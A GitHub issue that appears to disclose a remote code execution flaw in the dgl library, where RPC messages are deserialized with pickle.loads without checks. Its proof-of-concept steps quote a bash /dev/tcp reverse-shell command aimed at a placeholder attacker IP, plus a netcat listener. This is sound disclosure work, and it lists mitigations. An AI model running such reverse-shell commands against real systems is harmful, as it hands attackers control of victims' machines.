Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Vulnerability: Remote Code Execution by Pickle Deserialization via rpc.recv_request() in dmlc/dgl #7874

Open
Chenpinji opened this issue Mar 4, 2025 · 0 comments
Open

Vulnerability: Remote Code Execution by Pickle Deserialization via rpc.recv_request() in dmlc/dgl #7874

Chenpinji opened this issue Mar 4, 2025 · 0 comments

Comments

@Chenpinji
Copy link

Description

The dgl implements an rpc server (start_server() in rpc_server.py) for supporting the RPC communications among different remote users over networks (i.e. by “ip_config”). In its core functionality rpc.recv_request(), I found it will call function recv_rpc_meassge() and then call deserialize_from_payload(), which directly uses the pickles.loads() to deserialize the received messages without any sanitization, hence resulting in a remote code execution vulnerability by this RPC server.

Proof of Concept

  • Step1:
    The victim user starts a RPC server that connects to its network interface. Here, I use part of the official test code in github repo (test_rpc.py) to initialize the server, you can also reproduce the PoC by initializing your own rpc server by dgl.distributed.start_server().
    We give our example code in the attachment, you can reproduce it

code.zip

directly with server.py.

  • Step2:
    The attacker can then send malicious pickle dump data to the remote RPC address for the attack. We give an example to show how an attacker can acquire a command shell:
Image

In this example, the attacker modifies rpc_client and sends a request containing malicious pickle dump data to let the victim execute the command “bash -c ‘bash -i >& /dev/tcp/{ip address}/4444 0>&1’”, where ipaddress is an attacker’s server.

  • Step3:
    Attacker can use the nc tool (nc -l 4444) to create a reverse shell and wait for a connection. Then, the attacker runs the client to send the malicious request. Since the pickle deserialization vulnerability, the victim rpc server will execute the malicious command and consequently let an attacker get the command shell of the victim machine.

We also give a demo video in the attachment, along with modified rpc.py.

Impact

Remote code execution in the victim's machine.

Mitigation

(1)Sanitize RPCMessage.data before pickle.loads it, or use more secure deserialization methods such as safetensor or msgpack to replace the insecure pickle.loads.
(2)Enable authentication in RPC services to ensure that only authenticated and trusted users are permitted to join the same cluster.
(3) Alert a warning when using pickle to load data over the network.

dgl-rce-demo.mp4
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Chenpinji